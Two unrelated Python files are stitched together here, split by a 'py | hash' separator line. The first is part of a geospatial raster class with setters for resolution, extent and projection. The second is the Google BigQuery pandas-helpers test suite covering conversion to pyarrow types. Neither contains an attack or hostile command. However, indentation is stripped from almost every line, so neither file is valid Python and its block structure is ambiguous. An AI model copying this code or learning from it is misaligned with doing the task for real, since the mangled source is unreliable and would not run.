raise InvalidArgumentError("Invalid `pname` argument: {}".format(pname))
if not isinstance(res, numbers.Number) or res < 0 or res == float('inf'):
raise InvalidArgumentError("{} must be a positive, finite number".format(pname))
new_dx = res if pname in ('dx', 'res') else self.get_res('dx')
new_dy = res if pname in ('dy', 'res') else self.get_res('dy')
if hold != 'off':
xmin, ymax = self.get_xmin_ymax()
ysize, xsize = None, None
if hold == 'shape':
ysize, xsize = self.get_shape()
self.set_extent((xmin, ymax), (xmin + xsize*new_dx, ymax - ysize*new_dy), 'off', False)
elif hold == 'extent':
xmax, ymin = self.get_xmax_ymin()
new_xsize = (xmax-xmin)/new_dx
new_ysize = (ymax-ymin)/new_dy
new_xsize = int(new_xsize) if not np.isnan(new_xsize) else 0
new_ysize = int(new_ysize) if not np.isnan(new_ysize) else 0
self.set_shape((new_ysize, new_xsize), 'off', False)
self.set_extent((xmin, ymax), (xmin + new_xsize*new_dx, ymax - new_ysize*new_dy), 'off', False)
ysize, xsize = new_ysize, new_xsize
else:
raise InvalidArgumentError("Invalid `hold` argument: {}".format(hold))
if self.x is not None and len(self.x) > 1 and new_dx != (self.x[1]-self.x[0]):
self.set_param('x', self.get_x(xmin, xsize, new_dx), False)
if self.y is not None and len(self.y) > 1 and new_dy != (self.y[0]-self.y[1]):
self.set_param('y', self.get_y(ymax, ysize, new_dy), False)
if not skip_gt and (self.geo_trans is not None or set_core):
if self.geo_trans is None:
self.set_param('geo_trans')
new_geo_trans = np.array([
self.geo_trans[0],
new_dx,
self.geo_trans[2],
self.geo_trans[3],
self.geo_trans[4],
-new_dy
])
self.set_param('geo_trans', new_geo_trans, False)
if eval('self.{}'.format(pname)) is not None or set_core:
exec('self.{} = res'.format(pname))
if pname == 'res':
if self.dx is not None or set_core:
self.dx = res
if self.dy is not None or set_core:
self.dy = res
elif self.res is not None or set_core:
if self.dx == self.dy and self.dx is not None:
self.res = self.dx
else:
self.res = np.nan
def set_extent(self, xmin_ymax, xmax_ymin, hold, set_core=True,
skip_gt=False, skip_cc=False, skip_geom=False):
if hold in ('off', 'shape', 'res'):
pass
elif hold is None and xmax_ymin is None:
pass
else:
raise InvalidArgumentError("Invalid `hold` argument: {}".format(hold))
arg_check = [np.array(xmin_ymax)]
if xmax_ymin is None:
# Translation will be performed.
hold = None
else:
arg_check.append(np.array(xmax_ymin))
if True in [(p.ndim != 1 or len(p) != 2 or not np.issubdtype(p.dtype, np.number))
for p in arg_check]:
raise InvalidArgumentError("`xmin_ymax`, `xmax_ymin` must be convertible into a "
"numeric numpy.ndarray with ndim=1 and length 2")
new_xmin, new_ymax = xmin_ymax
new_xmax, new_ymin = None, None
if xmax_ymin is not None:
new_xmax, new_ymin = xmax_ymin
else:
ysize, xsize = self.get_shape()
new_xmax = new_xmin + xsize*self.get_res('dx')
new_ymin = new_ymax - ysize*self.get_res('dy')
littleX = True if (self.x is not None and len(self.x) < 2) else False
littleY = True if (self.y is not None and len(self.y) < 2) else False
if hold != 'off':
ysize, xsize = None, None
dx = None
dy = None
if hold == 'shape':
ysize, xsize = self.get_shape()
new_dx = (new_xmax-new_xmin)/xsize
new_dy = (new_ymax-new_ymin)/ysize
self.set_res('dx', new_dx, 'off', False)
self.set_res('dy', new_dy, 'off', False)
dx, dy = new_dx, new_dy
elif hold == 'res':
dx = self.get_res('dx')
dy = self.get_res('dy')
new_xsize = (new_xmax-new_xmin)/dx
new_ysize = (new_ymax-new_ymin)/dy
new_xsize = int(new_xsize) if not np.isnan(new_xsize) else 0
new_ysize = int(new_ysize) if not np.isnan(new_ysize) else 0
self.set_shape((new_ysize, new_xsize), 'off', False)
new_xmax = new_xmin + new_xsize*dx
new_ymin = new_ymax - new_ysize*dy
ysize, xsize = new_ysize, new_xsize
if hold is None:
# Perform translation.
if xmax_ymin is None:
if not littleX and self.x is not None and new_xmin != self.x[0]:
self.set_param('x', self.x + (new_xmin - self.x[0]), False)
self.x[0] = new_xmin
if not littleY and self.y is not None and new_ymax != self.y[0]:
self.set_param('y', self.y + (new_ymax - self.y[0]), False)
self.y[0] = new_ymax
else:
if not littleX and self.x is not None \
and (new_xmin != self.x[0] or new_xmax != (self.x[-1] + (self.x[1] - self.x[0]))):
self.set_param('x', self.get_x(new_xmin, xsize, dx), False)
if not littleY and self.y is not None \
and (new_ymax != self.y[0] or new_ymin != (self.y[-1] - (self.y[0] - self.y[1]))):
self.set_param('y', new_ymax - np.arange(ysize)*dy, False)
if littleX and len(self.x) == 1:
self.set_param('x', self.get_x(new_xmin, 1, 0), False)
if littleY and len(self.y) == 1:
self.set_param('y', self.get_y(new_ymax, 1, 0), False)
if not skip_gt and (self.geo_trans is not None or set_core):
if self.geo_trans is None:
self.set_param('geo_trans')
new_geo_trans = np.array([
new_xmin,
self.geo_trans[1],
self.geo_trans[2],
new_ymax,
self.geo_trans[4],
self.geo_trans[5]
])
self.set_param('geo_trans', new_geo_trans, False)
if not (skip_cc and skip_geom) and (self.corner_coords is not None or self.geom is not None):
corner_coords = np.array([
[new_xmin, new_ymax],
[new_xmax, new_ymax],
[new_xmax, new_ymin],
[new_xmin, new_ymin],
[new_xmin, new_ymax]
])
if not skip_cc and self.corner_coords is not None:
self.set_param('corner_coords', corner_coords, False)
if not skip_geom and self.geom is not None:
spat_ref = self.geom.GetSpatialReference()
geom_cc = corner_coords if not np.any(np.isnan(corner_coords)) else np.array([[0, 0]])
self.set_param('geom', ogr.Geometry(wkt=self.wkt(geom_cc)), False)
if spat_ref is not None:
self.geom.AssignSpatialReference(spat_ref)
def set_projection(self, proj_ref, set_core=True, skip_sr=False, skip_geom=False):
try:
spat_ref = osr.SpatialReference(proj_ref)
spat_ref.IsProjected()
except:
raise InvalidArgumentError("`proj_ref` must be a WKT projection string that can be "
"converted into an osgeo.osr.SpatialReference object")
if not skip_sr and self.spat_ref is not None:
self.set_param('spat_ref', spat_ref, False)
if not skip_geom and self.geom is not None:
self.geom.AssignSpatialReference(spat_ref)
if self.proj_ref is not None or set_core:
self.proj_ref = proj_ref
def set_param(self, pname, value=None, prop=True, hold=None, set_core=False, set_default=True):
if pname not in vars(self).keys():
raise InvalidArgumentError("Raster does not have param `pname` '{}'".format(pname))
if value is None:
# Set default value for parameter.
if not set_default:
return
elif eval('self.{}'.format(pname)) is not None:
# The parameter is already set. Without a value argument, there is nothing to do.
print("This Raster's '{}' data member is already set".format(pname))
return
elif isinstance(value, str) and value == 'extract':
value = self.extract_param(pname)
if value is None:
prop = False
if not prop:
hold = 'off'
if set_core:
prop = True
errmsg = None
if pname in ('all', 'no-ds'):
pass
elif pname == 'ds':
if value is None:
raise InvalidArgumentError("`ds` has no default to be set")
ds = value
if type(ds) != osgeo.gdal.Dataset:
errmsg = "{} must be an osgeo.gdal.Dataset"
else:
self.ds = ds
elif pname == 'shape':
shape = value if value is not None else self.get_shape()
if hold is None:
hold = 'extent'
self.set_shape(shape, hold)
elif pname == 'z':
z = value if value is not None else np.zeros(self.get_shape())
if type(z) != np.ndarray or not np.issubdtype(z.dtype, np.number) or z.ndim != 2:
errmsg = "{} must be a numeric numpy.ndarray with ndim=2".format(pname)
else:
if prop:
if hold is None:
hold = 'extent'
self.set_shape(z.shape, hold, set_core)
self.z = z
elif pname == 'x':
x = value if value is not None else self.get_x()
if type(x) != np.ndarray or not np.issubdtype(x.dtype, np.number) or x.ndim != 1 \
or (len(x) > 1 and np.any(~np.isnan(x)) \
and len(np.unique(np.round((x[1:] - x[:-1]), 8))) > 1):
errmsg = "{} must be a numeric numpy.ndarray with ndim=1 and regular spacing".format(pname)
else:
if prop:
old_ysize, old_xsize = self.get_shape()
old_dx = self.get_res('dx')
old_xmin, old_ymax = self.get_xmin_ymax()
old_xmax, old_ymin = self.get_xmax_ymin()
new_xsize = len(x)
new_dx = None
if len(x) == 0:
new_dx = np.nan
elif len(x) == 1:
new_dx = old_dx
else:
new_dx = (x[1] - x[0])
new_xmin = x[0] if len(x) > 0 else np.nan
new_xmax = new_xmin + new_xsize*new_dx
if new_xsize != old_xsize:
self.set_shape((old_ysize, new_xsize), 'off', set_core)
if new_dx != old_dx:
self.set_res('dx', new_dx, 'off', set_core)
if new_xmin != old_xmin or new_xmax != old_xmax:
self.set_extent((new_xmin, old_ymax), (new_xmax, old_ymin), 'off', set_core)
self.x = x
elif pname == 'y':
y = value if value is not None else self.get_y()
if type(y) != np.ndarray or not np.issubdtype(y.dtype, np.number) or y.ndim != 1 \
or (len(y) > 1 and np.any(~np.isnan(y)) \
and len(np.unique(np.round((y[1:] - y[:-1]), 8))) > 1):
errmsg = "{} must be of type numpy.ndarray with ndim=1 and regular spacing".format(pname)
else:
if prop:
old_ysize, old_xsize = self.get_shape()
old_dy = self.get_res('dy')
old_xmin, old_ymax = self.get_xmin_ymax()
old_xmax, old_ymin = self.get_xmax_ymin()
new_ysize = len(y)
new_dy = None
if len(y) == 0:
new_dy = np.nan
elif len(y) == 1:
new_dy = old_dy
else:
new_dy = (y[0] - y[1])
new_ymax = y[0] if len(y) > 0 else np.nan
new_ymin = new_ymax - new_ysize*new_dy
if new_ysize != old_ysize:
self.set_shape((new_ysize, old_xsize), 'off', set_core)
if new_dy != old_dy:
self.set_res('dy', new_dy, 'off', set_core)
if new_ymax != old_ymax or new_ymin != old_ymin:
self.set_extent((old_xmin, new_ymax), (old_xmax, new_ymin), 'off', set_core)
self.y = y
elif pname in ('dx', 'dy', 'res'):
val = value if value is not None else self.get_res(pname)
if prop:
if hold is None:
hold = 'extent'
self.set_res(pname, value, hold)
else:
if not isinstance(val, numbers.Number) or val < 0 or val == float('inf'):
errmsg = "{} must be a positive, finite number".format(pname)
else:
exec('self.{} = val'.format(pname))
elif pname == "geo_trans":
geo_trans = value if value is not None else self.get_geo_trans()
if type(geo_trans) != np.ndarray or not np.issubdtype(geo_trans.dtype, np.number) \
or geo_trans.shape != (6,):
errmsg = "{} must be a numeric numpy.ndarray with shape (6,)".format(pname)
else:
if prop:
if hold is None:
hold = 'extent'
old_xmin, old_ymax = self.get_xmin_ymax()
old_dx = self.get_res('dx')
old_dy = self.get_res('dy')
new_xmin, new_ymax = itemgetter(0, 3)(geo_trans)
new_dx = geo_trans[1]
new_dy = -geo_trans[5]
if new_dx != old_dx:
self.set_res('dx', new_dx, hold, set_core, skip_gt=True)
if new_dy != old_dy:
self.set_res('dy', new_dy, hold, set_core, skip_gt=True)
if new_xmin != old_xmin or new_ymax != old_ymax:
self.set_extent((new_xmin, new_ymax), None, None, set_core, skip_gt=True)
self.geo_trans = geo_trans
elif pname == 'corner_coords':
corner_coords = value if value is not None else self.get_corner_coords()
if type(corner_coords) != np.ndarray or not np.issubdtype(corner_coords.dtype, np.number) \
or not corner_coords.shape == (5, 2):
errmsg = "{} must be a numeric numpy.ndarray with shape (5, 2)".format(pname)
else:
if prop:
if hold is None:
hold = 'res'
self.set_extent(corner_coords[0], corner_coords[2], hold, set_core, skip_cc=True)
self.corner_coords = corner_coords
elif pname == 'proj_ref':
proj_ref = value if value is not None else RASTER_DEFAULT_PROJREF
if prop:
self.set_projection(proj_ref)
else:
try:
spat_ref = osr.SpatialReference(proj_ref)
spat_ref.IsProjected()
self.proj_ref = proj_ref
except:
raise InvalidArgumentError("{} must be a WKT projection string that can be"
" converted into an osgeo.osr.SpatialReference"
" object".format(pname))
elif pname == 'spat_ref':
spat_ref = value if value is not None else osr.SpatialReference(RASTER_DEFAULT_PROJREF)
try:
if type(spat_ref) != osgeo.osr.SpatialReference:
raise InvalidArgumentError
spat_ref.IsProjected()
except:
errmsg = "{} must be a projected osgeo.osr.SpatialReference object".format(pname)
if errmsg is None:
if prop:
self.set_projection(spat_ref.ExportToWkt(), set_core, skip_sr=True)
self.spat_ref = spat_ref
elif pname in ('geom', 'geom_sr'):
geom = value if value is not None else self.get_geom()
try:
if type(geom) != osgeo.ogr.Geometry \
or geom.GetDimension() != 2 or geom.GetCoordinateDimension() != 2:
raise InvalidArgumentError
wkt = geom.ExportToWkt()
if len(wkt.split(',')) != 5:
prop = False
except:
errmsg = "{} must be a 2D osgeo.ogr.Geometry object"\
" containing 5 pairs of 2D coordinates".format(pname)
if errmsg is None:
if prop:
if hold is None:
hold = 'res'
corner_coords = self.wkt_to_coords(wkt)
self.set_extent(corner_coords[0], corner_coords[2], hold, set_core, skip_geom=True)
spat_ref = self.geom.GetSpatialReference()
if spat_ref is not None:
self.set_projection(spat_ref.ExportToWkt(), set_core, skip_geom=True)
self.geom = geom
else:
errmsg = "No setter mechanism has been implemented yet for parameter '{}'".format(pname)
if errmsg is not None:
if value is not None:
raise InvalidArgumentError(errmsg)
else:
raise RasterIOError(errmsg)
def refresh_param(self, pname):
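        """Clear the stored value of parameter `pname` and recompute it from the Raster's other parameters."""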
if pname not in vars(self).keys():
raise InvalidArgumentError("Raster does not have param `pname` '{}'".format(pname))
exec('self.{} = None'.format(pname))
self.set_param(pname)
def prop_param(self, pname, hold=None, set_core=False):
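        """Propagate the stored value of parameter `pname` to the Raster's linked parameters, optionally holding `hold` fixed."""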
if pname not in vars(self).keys():
raise InvalidArgumentError("Raster does not have param `pname` '{}'".format(pname))
value = eval('self.{}'.format(pname))
if value is None:
print("No value is stored in this Raster's '{}' parameter to propagate".format(pname))
return
exec('self.{} = None'.format(pname))
self.set_param(pname, value, True, hold, set_core, False)
|
py | 1a3f918eb14b3453bf006deb06ca69d28df59e6a | # Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import collections
import datetime
import decimal
import functools
import operator
import queue
import warnings
import pkg_resources
import mock
try:
import pandas
import pandas.api.types
import pandas.testing
except ImportError: # pragma: NO COVER
pandas = None
import pyarrow
import pyarrow.types
try:
import geopandas
except ImportError: # pragma: NO COVER
geopandas = None
import pytest
from google import api_core
from google.cloud import bigquery_storage
from google.cloud.bigquery import _helpers
from google.cloud.bigquery import schema
PANDAS_MINIUM_VERSION = pkg_resources.parse_version("1.0.0")
if pandas is not None:
PANDAS_INSTALLED_VERSION = pkg_resources.get_distribution("pandas").parsed_version
else:
# Set to less than MIN version.
PANDAS_INSTALLED_VERSION = pkg_resources.parse_version("0.0.0")
@pytest.fixture
def module_under_test():
from google.cloud.bigquery import _pandas_helpers
return _pandas_helpers
def is_none(value):
return value is None
def is_datetime(type_):
# See: https://cloud.google.com/bigquery/docs/reference/standard-sql/data-types#datetime-type
return all_(
pyarrow.types.is_timestamp,
lambda type_: type_.unit == "us",
lambda type_: type_.tz is None,
)(type_)
def is_numeric(type_):
# See: https://cloud.google.com/bigquery/docs/reference/standard-sql/data-types#numeric-type
return all_(
pyarrow.types.is_decimal,
lambda type_: type_.precision == 38,
lambda type_: type_.scale == 9,
)(type_)
def is_bignumeric(type_):
# See: https://cloud.google.com/bigquery/docs/reference/standard-sql/data-types#numeric-type
return all_(
pyarrow.types.is_decimal,
lambda type_: type_.precision == 76,
lambda type_: type_.scale == 38,
)(type_)
def is_timestamp(type_):
# See: https://cloud.google.com/bigquery/docs/reference/standard-sql/data-types#timestamp-type
return all_(
pyarrow.types.is_timestamp,
lambda type_: type_.unit == "us",
lambda type_: type_.tz == "UTC",
)(type_)
def do_all(functions, value):
return all((func(value) for func in functions))
def all_(*functions):
return functools.partial(do_all, functions)
def test_is_datetime():
assert is_datetime(pyarrow.timestamp("us", tz=None))
assert not is_datetime(pyarrow.timestamp("ms", tz=None))
assert not is_datetime(pyarrow.timestamp("us", tz="UTC"))
assert not is_datetime(pyarrow.timestamp("ns", tz="UTC"))
assert not is_datetime(pyarrow.string())
def test_do_all():
assert do_all((lambda _: True, lambda _: True), None)
assert not do_all((lambda _: True, lambda _: False), None)
assert not do_all((lambda _: False,), None)
def test_all_():
assert all_(lambda _: True, lambda _: True)(None)
assert not all_(lambda _: True, lambda _: False)(None)
@pytest.mark.parametrize(
"bq_type,bq_mode,is_correct_type",
[
("STRING", "NULLABLE", pyarrow.types.is_string),
("STRING", None, pyarrow.types.is_string),
("string", "NULLABLE", pyarrow.types.is_string),
("StRiNg", "NULLABLE", pyarrow.types.is_string),
("BYTES", "NULLABLE", pyarrow.types.is_binary),
("INTEGER", "NULLABLE", pyarrow.types.is_int64),
("INT64", "NULLABLE", pyarrow.types.is_int64),
("FLOAT", "NULLABLE", pyarrow.types.is_float64),
("FLOAT64", "NULLABLE", pyarrow.types.is_float64),
("NUMERIC", "NULLABLE", is_numeric),
("BIGNUMERIC", "NULLABLE", is_bignumeric),
("BOOLEAN", "NULLABLE", pyarrow.types.is_boolean),
("BOOL", "NULLABLE", pyarrow.types.is_boolean),
("TIMESTAMP", "NULLABLE", is_timestamp),
("DATE", "NULLABLE", pyarrow.types.is_date32),
("TIME", "NULLABLE", pyarrow.types.is_time64),
("DATETIME", "NULLABLE", is_datetime),
("GEOGRAPHY", "NULLABLE", pyarrow.types.is_string),
("UNKNOWN_TYPE", "NULLABLE", is_none),
# Use pyarrow.list_(item_type) for repeated (array) fields.
(
"STRING",
"REPEATED",
all_(
pyarrow.types.is_list,
lambda type_: pyarrow.types.is_string(type_.value_type),
),
),
(
"STRING",
"repeated",
all_(
pyarrow.types.is_list,
lambda type_: pyarrow.types.is_string(type_.value_type),
),
),
(
"STRING",
"RePeAtEd",
all_(
pyarrow.types.is_list,
lambda type_: pyarrow.types.is_string(type_.value_type),
),
),
(
"BYTES",
"REPEATED",
all_(
pyarrow.types.is_list,
lambda type_: pyarrow.types.is_binary(type_.value_type),
),
),
(
"INTEGER",
"REPEATED",
all_(
pyarrow.types.is_list,
lambda type_: pyarrow.types.is_int64(type_.value_type),
),
),
(
"INT64",
"REPEATED",
all_(
pyarrow.types.is_list,
lambda type_: pyarrow.types.is_int64(type_.value_type),
),
),
(
"FLOAT",
"REPEATED",
all_(
pyarrow.types.is_list,
lambda type_: pyarrow.types.is_float64(type_.value_type),
),
),
(
"FLOAT64",
"REPEATED",
all_(
pyarrow.types.is_list,
lambda type_: pyarrow.types.is_float64(type_.value_type),
),
),
(
"NUMERIC",
"REPEATED",
all_(pyarrow.types.is_list, lambda type_: is_numeric(type_.value_type)),
),
(
"BIGNUMERIC",
"REPEATED",
all_(pyarrow.types.is_list, lambda type_: is_bignumeric(type_.value_type)),
),
(
"BOOLEAN",
"REPEATED",
all_(
pyarrow.types.is_list,
lambda type_: pyarrow.types.is_boolean(type_.value_type),
),
),
(
"BOOL",
"REPEATED",
all_(
pyarrow.types.is_list,
lambda type_: pyarrow.types.is_boolean(type_.value_type),
),
),
(
"TIMESTAMP",
"REPEATED",
all_(pyarrow.types.is_list, lambda type_: is_timestamp(type_.value_type)),
),
(
"DATE",
"REPEATED",
all_(
pyarrow.types.is_list,
lambda type_: pyarrow.types.is_date32(type_.value_type),
),
),
(
"TIME",
"REPEATED",
all_(
pyarrow.types.is_list,
lambda type_: pyarrow.types.is_time64(type_.value_type),
),
),
(
"DATETIME",
"REPEATED",
all_(pyarrow.types.is_list, lambda type_: is_datetime(type_.value_type)),
),
(
"GEOGRAPHY",
"REPEATED",
all_(
pyarrow.types.is_list,
lambda type_: pyarrow.types.is_string(type_.value_type),
),
),
("RECORD", "REPEATED", is_none),
("UNKNOWN_TYPE", "REPEATED", is_none),
],
)
def test_bq_to_arrow_data_type(module_under_test, bq_type, bq_mode, is_correct_type):
field = schema.SchemaField("ignored_name", bq_type, mode=bq_mode)
actual = module_under_test.bq_to_arrow_data_type(field)
assert is_correct_type(actual)
@pytest.mark.parametrize("bq_type", ["RECORD", "record", "STRUCT", "struct"])
def test_bq_to_arrow_data_type_w_struct(module_under_test, bq_type):
fields = (
schema.SchemaField("field01", "STRING"),
schema.SchemaField("field02", "BYTES"),
schema.SchemaField("field03", "INTEGER"),
schema.SchemaField("field04", "INT64"),
schema.SchemaField("field05", "FLOAT"),
schema.SchemaField("field06", "FLOAT64"),
schema.SchemaField("field07", "NUMERIC"),
schema.SchemaField("field08", "BIGNUMERIC"),
schema.SchemaField("field09", "BOOLEAN"),
schema.SchemaField("field10", "BOOL"),
schema.SchemaField("field11", "TIMESTAMP"),
schema.SchemaField("field12", "DATE"),
schema.SchemaField("field13", "TIME"),
schema.SchemaField("field14", "DATETIME"),
schema.SchemaField("field15", "GEOGRAPHY"),
)
field = schema.SchemaField("ignored_name", bq_type, mode="NULLABLE", fields=fields)
actual = module_under_test.bq_to_arrow_data_type(field)
expected = (
pyarrow.field("field01", pyarrow.string()),
pyarrow.field("field02", pyarrow.binary()),
pyarrow.field("field03", pyarrow.int64()),
pyarrow.field("field04", pyarrow.int64()),
pyarrow.field("field05", pyarrow.float64()),
pyarrow.field("field06", pyarrow.float64()),
pyarrow.field("field07", module_under_test.pyarrow_numeric()),
pyarrow.field("field08", module_under_test.pyarrow_bignumeric()),
pyarrow.field("field09", pyarrow.bool_()),
pyarrow.field("field10", pyarrow.bool_()),
pyarrow.field("field11", module_under_test.pyarrow_timestamp()),
pyarrow.field("field12", pyarrow.date32()),
pyarrow.field("field13", module_under_test.pyarrow_time()),
pyarrow.field("field14", module_under_test.pyarrow_datetime()),
pyarrow.field("field15", pyarrow.string()),
)
expected = pyarrow.struct(expected)
assert pyarrow.types.is_struct(actual)
assert actual.num_fields == len(fields)
assert actual.equals(expected)
@pytest.mark.parametrize("bq_type", ["RECORD", "record", "STRUCT", "struct"])
def test_bq_to_arrow_data_type_w_array_struct(module_under_test, bq_type):
fields = (
schema.SchemaField("field01", "STRING"),
schema.SchemaField("field02", "BYTES"),
schema.SchemaField("field03", "INTEGER"),
schema.SchemaField("field04", "INT64"),
schema.SchemaField("field05", "FLOAT"),
schema.SchemaField("field06", "FLOAT64"),
schema.SchemaField("field07", "NUMERIC"),
schema.SchemaField("field08", "BIGNUMERIC"),
schema.SchemaField("field09", "BOOLEAN"),
schema.SchemaField("field10", "BOOL"),
schema.SchemaField("field11", "TIMESTAMP"),
schema.SchemaField("field12", "DATE"),
schema.SchemaField("field13", "TIME"),
schema.SchemaField("field14", "DATETIME"),
schema.SchemaField("field15", "GEOGRAPHY"),
)
field = schema.SchemaField("ignored_name", bq_type, mode="REPEATED", fields=fields)
actual = module_under_test.bq_to_arrow_data_type(field)
expected = (
pyarrow.field("field01", pyarrow.string()),
pyarrow.field("field02", pyarrow.binary()),
pyarrow.field("field03", pyarrow.int64()),
pyarrow.field("field04", pyarrow.int64()),
pyarrow.field("field05", pyarrow.float64()),
pyarrow.field("field06", pyarrow.float64()),
pyarrow.field("field07", module_under_test.pyarrow_numeric()),
pyarrow.field("field08", module_under_test.pyarrow_bignumeric()),
pyarrow.field("field09", pyarrow.bool_()),
pyarrow.field("field10", pyarrow.bool_()),
pyarrow.field("field11", module_under_test.pyarrow_timestamp()),
pyarrow.field("field12", pyarrow.date32()),
pyarrow.field("field13", module_under_test.pyarrow_time()),
pyarrow.field("field14", module_under_test.pyarrow_datetime()),
pyarrow.field("field15", pyarrow.string()),
)
expected_value_type = pyarrow.struct(expected)
assert pyarrow.types.is_list(actual)
assert pyarrow.types.is_struct(actual.value_type)
assert actual.value_type.num_fields == len(fields)
assert actual.value_type.equals(expected_value_type)
def test_bq_to_arrow_data_type_w_struct_unknown_subfield(module_under_test):
fields = (
schema.SchemaField("field1", "STRING"),
schema.SchemaField("field2", "INTEGER"),
# Don't know what to convert UNKNOWN_TYPE to, let type inference work,
# instead.
schema.SchemaField("field3", "UNKNOWN_TYPE"),
)
field = schema.SchemaField("ignored_name", "RECORD", mode="NULLABLE", fields=fields)
with warnings.catch_warnings(record=True) as warned:
actual = module_under_test.bq_to_arrow_data_type(field)
assert actual is None
assert len(warned) == 1
warning = warned[0]
assert "field3" in str(warning)
@pytest.mark.parametrize(
"bq_type,rows",
[
("STRING", ["abc", None, "def", None]),
("BYTES", [b"abc", None, b"def", None]),
("INTEGER", [123, None, 456, None]),
("INT64", [-9223372036854775808, None, 9223372036854775807, 123]),
("FLOAT", [1.25, None, 3.5, None]),
(
"NUMERIC",
[
decimal.Decimal("-99999999999999999999999999999.999999999"),
None,
decimal.Decimal("99999999999999999999999999999.999999999"),
decimal.Decimal("999.123456789"),
],
),
(
"BIGNUMERIC",
[
decimal.Decimal("-{d38}.{d38}".format(d38="9" * 38)),
None,
decimal.Decimal("{d38}.{d38}".format(d38="9" * 38)),
decimal.Decimal("3.141592653589793238462643383279"),
],
),
("BOOLEAN", [True, None, False, None]),
("BOOL", [False, None, True, None]),
(
"TIMESTAMP",
[
datetime.datetime(1, 1, 1, 0, 0, 0, tzinfo=datetime.timezone.utc),
None,
datetime.datetime(
9999, 12, 31, 23, 59, 59, 999999, tzinfo=datetime.timezone.utc
),
datetime.datetime(1970, 1, 1, 0, 0, 0, tzinfo=datetime.timezone.utc),
],
),
(
"DATE",
[
datetime.date(1, 1, 1),
None,
datetime.date(9999, 12, 31),
datetime.date(1970, 1, 1),
],
),
(
"TIME",
[
datetime.time(0, 0, 0),
None,
datetime.time(23, 59, 59, 999999),
datetime.time(12, 0, 0),
],
),
(
"DATETIME",
[
datetime.datetime(1, 1, 1, 0, 0, 0),
datetime.datetime(9999, 12, 31, 23, 59, 59, 999999),
None,
datetime.datetime(1970, 1, 1, 0, 0, 0),
datetime.datetime(1999, 3, 14, 15, 9, 26, 535898),
],
),
(
"GEOGRAPHY",
[
"POINT(30 10)",
None,
"LINESTRING (30 10, 10 30, 40 40)",
"POLYGON ((30 10, 40 40, 20 40, 10 20, 30 10))",
],
),
],
)
@pytest.mark.skipif(pandas is None, reason="Requires `pandas`")
def test_bq_to_arrow_array_w_nullable_scalars(module_under_test, bq_type, rows):
series = pandas.Series(rows, dtype="object")
bq_field = schema.SchemaField("field_name", bq_type)
arrow_array = module_under_test.bq_to_arrow_array(series, bq_field)
roundtrip = arrow_array.to_pylist()
assert rows == roundtrip
@pytest.mark.parametrize(
"bq_type,rows",
[
(
"TIMESTAMP",
[
"1971-09-28T23:59:07+00:00",
"1975-04-09T23:59:02+00:00",
"1979-08-17T23:59:05+00:00",
"NaT",
"1983-05-09T13:00:00+00:00",
],
),
(
"DATETIME",
[
"1971-09-28T23:59:07",
"1975-04-09T23:59:02",
"1979-08-17T23:59:05",
"NaT",
"1983-05-09T13:00:00",
],
),
],
)
@pytest.mark.skipif(pandas is None, reason="Requires `pandas`")
def test_bq_to_arrow_array_w_pandas_timestamp(module_under_test, bq_type, rows):
rows = [pandas.Timestamp(row) for row in rows]
series = pandas.Series(rows)
bq_field = schema.SchemaField("field_name", bq_type)
arrow_array = module_under_test.bq_to_arrow_array(series, bq_field)
roundtrip = arrow_array.to_pandas()
assert series.equals(roundtrip)
@pytest.mark.skipif(pandas is None, reason="Requires `pandas`")
def test_bq_to_arrow_array_w_arrays(module_under_test):
rows = [[1, 2, 3], [], [4, 5, 6]]
series = pandas.Series(rows, dtype="object")
bq_field = schema.SchemaField("field_name", "INTEGER", mode="REPEATED")
arrow_array = module_under_test.bq_to_arrow_array(series, bq_field)
roundtrip = arrow_array.to_pylist()
assert rows == roundtrip
@pytest.mark.parametrize("bq_type", ["RECORD", "record", "STRUCT", "struct"])
@pytest.mark.skipif(pandas is None, reason="Requires `pandas`")
def test_bq_to_arrow_array_w_structs(module_under_test, bq_type):
rows = [
{"int_col": 123, "string_col": "abc"},
None,
{"int_col": 456, "string_col": "def"},
]
series = pandas.Series(rows, dtype="object")
bq_field = schema.SchemaField(
"field_name",
bq_type,
fields=(
schema.SchemaField("int_col", "INTEGER"),
schema.SchemaField("string_col", "STRING"),
),
)
arrow_array = module_under_test.bq_to_arrow_array(series, bq_field)
roundtrip = arrow_array.to_pylist()
assert rows == roundtrip
@pytest.mark.skipif(pandas is None, reason="Requires `pandas`")
def test_bq_to_arrow_array_w_special_floats(module_under_test):
bq_field = schema.SchemaField("field_name", "FLOAT64")
rows = [float("-inf"), float("nan"), float("inf"), None]
series = pandas.Series(rows, dtype="object")
arrow_array = module_under_test.bq_to_arrow_array(series, bq_field)
roundtrip = arrow_array.to_pylist()
assert len(rows) == len(roundtrip)
assert roundtrip[0] == float("-inf")
# Since we are converting from pandas, NaN is treated as NULL in pyarrow
# due to pandas conventions.
# https://arrow.apache.org/docs/python/data.html#none-values-and-nan-handling
assert roundtrip[1] is None
assert roundtrip[2] == float("inf")
assert roundtrip[3] is None
@pytest.mark.skipif(geopandas is None, reason="Requires `geopandas`")
def test_bq_to_arrow_array_w_geography_dtype(module_under_test):
from shapely import wkb, wkt
bq_field = schema.SchemaField("field_name", "GEOGRAPHY")
series = geopandas.GeoSeries([None, wkt.loads("point(0 0)")])
array = module_under_test.bq_to_arrow_array(series, bq_field)
# The result is binary, because we use wkb format
assert array.type == pyarrow.binary()
assert array.to_pylist() == [None, wkb.dumps(series[1])]
# All na:
series = geopandas.GeoSeries([None, None])
array = module_under_test.bq_to_arrow_array(series, bq_field)
assert array.type == pyarrow.string()
assert array.to_pylist() == list(series)
@pytest.mark.skipif(geopandas is None, reason="Requires `geopandas`")
def test_bq_to_arrow_array_w_geography_type_shapely_data(module_under_test):
from shapely import wkb, wkt
bq_field = schema.SchemaField("field_name", "GEOGRAPHY")
series = pandas.Series([None, wkt.loads("point(0 0)")])
array = module_under_test.bq_to_arrow_array(series, bq_field)
# The result is binary, because we use wkb format
assert array.type == pyarrow.binary()
assert array.to_pylist() == [None, wkb.dumps(series[1])]
# All na:
series = pandas.Series([None, None])
array = module_under_test.bq_to_arrow_array(series, bq_field)
assert array.type == pyarrow.string()
assert array.to_pylist() == list(series)
